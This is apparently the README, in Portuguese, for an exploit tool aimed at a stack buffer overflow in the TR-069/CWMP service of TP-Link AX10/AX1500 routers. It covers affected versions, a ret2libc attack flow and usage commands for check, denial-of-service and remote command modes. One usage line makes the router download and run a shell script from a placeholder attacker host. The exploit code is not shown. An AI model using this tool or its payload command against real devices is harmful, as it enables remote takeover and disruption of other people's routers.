
Exploit para TP-Link AX10/AX1500 de estouro de buffer de pilha no CWMP (TR-069) possibilitando execução remota de código via ret2libc com bypass de ASLR. Inclui modos de apenas verificação, DoS e execução de comandos.
TP-Link AX10/AX1500 CWMP Estouro de Buffer RCE
Estouro de buffer baseado em pilha no CWMP (TR-069) levando à execução remota de código.
| Campo | Valor |
|---|---|
| Produto | TP-Link AX10, AX1500 |
| Afetado | AX10 < 1.2.1, AX1500 < 1.3.11 |
| CVSS | 8.6 (Alto) |
| Tipo | Estouro de Buffer de Pilha |
| Vetor | CWMP/TR-069 (porta 7547) |
| Impacto | Execução Remota de Código |
flowchart LR
A[Attacker] --> B["Malicious ACS"]
B --> C["SetParameterValues"]
C --> D["Stack Overflow"]
D --> E["Overwrite PC"]
E --> F["ret2libc"]
F --> G["system()"]
G --> H["RCE"]
A vulnerabilidade está no tratamento do processo cwmp de requisições SOAP SetParameterValues. A entrada é usada para calcular o tamanho do buffer sem verificação de limites.
Exploração:
python exploit.py <target_ip> --check-only
python exploit.py 192.168.0.1 --dos
python exploit.py 192.168.0.1 -c "wget http://attacker/shell.sh -O /tmp/s; sh /tmp/s"
Nenhum (usa biblioteca padrão)
Apenas para testes de segurança autorizados.
| Flag | Descrição | Padrão |
|---|
-p, --port | Porta CWMP | 7547 |
-c, --command | Comando para RCE | nenhum |
-t, --timeout | Timeout do socket | 10 |
--dos | Apenas modo DoS | desligado |
--check-only | Verificar se é vulnerável | desligado |